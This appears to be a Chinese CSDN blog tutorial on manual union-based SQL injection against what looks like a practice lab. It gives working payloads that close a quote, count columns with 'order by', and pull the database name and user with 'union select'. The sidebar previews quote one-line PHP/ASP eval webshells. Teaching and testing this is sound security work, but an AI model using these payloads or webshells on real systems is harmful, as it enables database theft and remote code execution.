SQL Injection手动测试---基于union的信息获取

最新推荐文章于 2024-07-03 10:27:52 发布
最新推荐文章于 2024-07-03 10:27:52 发布
阅读量202 收藏 1
点赞数
分类专栏: web 安全 文章标签: sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ethan024/article/details/115188551
版权
安全 同时被 2 个专栏收录
39 篇文章 0 订阅
订阅专栏
web
37 篇文章 0 订阅
订阅专栏

SQL Injection手动测试—基于union的信息获取(本文仅限于技术分享或参考)

union联合查询:
可以通过联合查询来查询指定的数据。
select username, password from user where id=1 union select 字段1,字段2 from 表名;(联合查询的字段数需要和主查询一致)

例:mysql> select id, email from member where username=‘kobe’ union select username, pw from member where id=1;
在这里插入图片描述

  1. 如果此时找到一个SQL注入漏洞,可以通过一些方法获取数据库基本信息(数据库版本,权限,对应数据库名称)
    (1)通过select database();获取数据库名称:
    在这里插入图片描述
    (2)通过select user();获取当前数据库权限:
    在这里插入图片描述
    (3)通过select version();获取当前数据库版本:
    在这里插入图片描述
  2. 通过SQL输入来获取数据库名称和权限等(通过字符型的注入进行演示):
    (1)先构造闭合:aaaa’
    (2)使用order by猜测主查询有几个字段:aaaa’ order by 5#
    在这里插入图片描述
    提交之后查看结果,第5列不存在:
    在这里插入图片描述
    再输入aaaa’ order by 3#:
    在这里插入图片描述
    提交之后查看结果,第3列不存在:
    在这里插入图片描述
    再输入aaaa’ order by 2#,发现查询语句正常执行,意味着主查询里面有两个字段:
    在这里插入图片描述
    在这里插入图片描述
    (3)使用union做拼接:aaaa’ union select database(), user()#
    在这里插入图片描述
    将数据库名称和权限查询出来(同理也可以查版本):
    在这里插入图片描述
汉堡哥哥27
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Metasploit SQL注入漏洞渗透测试实战
悦分享
12-07 1058
现代化Web应用程序在设计时都会将代码与数据进行分离,这些数据会独立保存在服务器中。当数据量较大的时候,需要使用一种特殊的数据管理程序,也就是常说的数据库。目前比较常用的数据库软件有MySQLSQLServer、Access等,不过它们的操作都要遵循SQL(Structured Query Language,结构化查询语言)标准,但是不同的产品之间存在着一定的差别。SQL注入攻击是通过操作输入来修改SQL语句,以达到执行代码对Web服务器进行攻击的方式。
SQL Inject漏洞手动测试:基于union联合查询的信息获取
北冥有鱼
03-27 392
union联合查询,简单来说就是可以通过联合查询来查询指定的数据 用法举例: select username,password from user where id=1 **union** select 字段1,字段2 form 表名 注意,联合查询的字段数需要和主查询一致!如果字段数不一样的话会报错。 ...
5-5sqli手动测试-通过union进行数据获取
山兔的博客
05-03 986
我们本篇文章将讲述一下手工注入测试 SQL Inject手动测试-基于union信息获取Union联合查询、order by知识补充  “information_schema”数据库介绍  基于union联合查询的信息获取selectSQL Inject漏洞手动测试:基于union联合查询的信息获取 union 联合查询:可以通过联合查询来查询指定的数据 用法举例: select username,password from user where id=1 union select 字段1
SQL注入之union 联合注入
weixin_53711701的博客
01-16 4680
SQL注入之union联合注入
SQL Injection手动测试---OS远程测试
Ethan024的博客
04-01 167
一. 一句话木马 什么是一句话木马? 一种短小而精悍的木马客户端,隐蔽性好,且功能强大。可将这些木马写入到文件中,通过对文件的访问来执行这些木马 PHP:<?php @eval($_POST['chopper']);?> ASP:<%eval request(“chopper”)%> ASP.NET:<%@ Page Language=“Jscript”%><%eval(Request.Item[“chopper”], “unsafe”);%> 二. 如何通过
Testing for SQL Injection
kezhen的专栏
03-27 1937
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005) Brief Summary A SQL injection attack consists of insertion or "injection" of either a partial or complete SQL query
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 012-网络安全应急技术与实践(Web层-SQL注入)
热门推荐
时光隧道
02-09 7万+
Web层攻击分析与应急响应演练是指对Web应用程序进行攻击分析,发现潜在的漏洞和安全威胁,并在发生安全事件时能够迅速做出应急响应措施的过程。进行Web层攻击分析是为了了解Web应用程序存在的弱点和漏洞,从而提前对其进行修复和加固。攻击分析可以包括对Web应用程序进行安全扫描、漏洞评估和渗透测试等活动,通过模拟真实攻击场景,发现可能被黑客利用的漏洞,如SQL注入、跨站点脚本攻击(XSS)、跨站点请求伪造(CSRF)等。攻击分析的目的是为了及早发现和修复潜在的安全问题,确保Web应用程序的安全性。
sql注入过滤select_SQL注入高级进阶-堆叠注入
weixin_39808803的博客
11-21 1346
原理0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。0x01 堆叠注入原理 在SQL中,分号(;)是用来表示一条s...
SQL必知必会36-SQL注入:你的SQL是如何被注入的?
最新发布
qq_53280238的博客
07-03 708
在今天的内容中,我使用了 sqli-labs 注入平台作为实验数据,使用了 SQLmap 工具自动完成 SQL 注入。SQL 注入的方法还有很多,我们今天讲解的只是其中一个方式。你如果对 SQL 注入感兴趣,也可以对 sqli-labs 中其他例子进行学习,了解更多 SQL 注入的方法。在这个过程中,最主要的是理解 SQL 注入的原理。在日常工作中,我们需要对用户提交的内容进行验证,以防止 SQL 注入。
GET-ERROR based-Single quotes – String (GET型基于错误的单引号字符型注入) Less-1
water0diamond的博客
03-12 928
关于数据库的一些基础,会在前一篇提前准备篇中提到 首先打开网站首页,会发现如下界面:显示请输入id作为带数值的参数,那么下一步,我们就可以将参数传入试着提交然后看会有什么返回值。 使用get方式提交id参数,这样我们就可以得到返回值。可以看得到首页给出了用户名和密码。 然后再测id类型是否为字符串,用单引号测试,出现‘’’说明id为字符串类型 那么下面我们试着添加...
sql注入-union select
我不是大牛
06-24 2万+
什么是SQL注入 SQL注入(Sql Injection ) 是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击 这些参数传递给后台的SQL数据库服务器加以解析并执行 哪里存在SQL注入? GET POST HTTP头部注入 Cookie注入 任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入。 SQL注入的分类 根据SQL数据类型分类 整型注...
N9-SQL注入(union注入)
尐猴子君ii的博客
04-01 852
今天猴子君要向大家介绍的是SQL注入的union章节。 首先打开pikachu渗透测试平台。 找到sql字符型注入的章节。 union语句为数据库联合语句,用法如下: SELECT 字段1,字段2 from 表名 where 条件 union SELECT 字段1,字段2 from 表名 where 条件 而union联合字段后面的查询字段的个数要与前面的字段个数相同,所以我们可以使用 ...
sql注入与sqlmap工具使用
Q1n6
10-28 6284
SQL的注入类型: Boolean-based blind SQL injection(布尔型注入)Error-based SQL injection(报错型注入)UNION query SQL injection(可联合查询注入)Stacked queries SQL injection(可多语句查询注入)Time-based blind SQL injection(基于时间延迟注入)
SQL注入-union注入
july07070707的博客
05-10 6172
SQL注入之联合查询注入
selecthch的博客
06-07 4万+
联合查询注入利用的前提前提条件:页面上有显示位什么是显示位?在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位联合注入的过程1、判断注入点2、判断是整型还是字符型3、判断查询列数4、判断显示位5、获取所有数据库名6、获取数据库(test)所有表名7、获取(数据库:test,表:admin)中所有字段名8、获取字段中的数据一、...
《WEB安全渗透测试》(1)SQL注入实战:union注入
午夜安全
09-30 9635
《WEB安全渗透测试》(1)SQL注入实战:union注入 1)判断是否存在注入URL:http://www.tianchi.com/web/union.php?id=1URL:http://www.tianchi.com/web/union.php?id=1'URL:http://www.tianchi.com/web/union.php?id=1 and 1=1URL:http://www.tianchi.com/web/union.php?id=1 and 1=2发现可能存在SQL注入漏洞。.....
sql注入之union联合注入
kingdring的博客
11-14 1万+
ps:21号祥云杯,为了避免连到都签不上,临时抱一波佛脚。 声明1:本文章使用的数据皆为官网公示,为保护信息已做打码 声明2:此系列文章仅用于CTF学习及信息安全防御技术,建议读者应用之前在 本地 搭建数据库或靶场等实践环境,在公网使用相关技术前请通读 《网络安全法》 union联合注入 上一篇大致说了sql注入的一些基本原理,这一篇说一说union的相关内容 联合查询 啥是联合查询 select a from b union select c from d where e; 大致就是这样 显然union
数据库Union的用法
zhengqiqiqinqin的专栏
12-29 4万+
原文地址:http://www.cnblogs.com/alexusli/archive/2009/02/02/1382509.html SQL UnionSQL Union All用法 UNION 指令的目的是将两个 SQL 语句的结果合并起来。从这个角度来看, UNION 跟 JOIN 有些许类似,因为这两个指令都可以由多个表格中撷取资料。 UNION 的一个限制是两个 SQL
SQL手工注入测试
十年磨一剑,霜刃未曾试!
09-24 5694
login.html 请登录 请输入密码: 用 户: 密 码: login.asp 登录 <% inname=Request("name") inpass=Request("pass") set co
SQL SERVER:基础T-SQL查询与实践案例
在这个SQL SERVER查询语句练习中,我们将探讨如何使用T-SQL(Transact-SQL)语言在已创建的数据库结构中执行基本操作。首先,我们创建了四个关键表格:STUDENT、COURSE、SCORE和TEACHER,用于存储学生、课程、分数和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

汉堡哥哥27

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值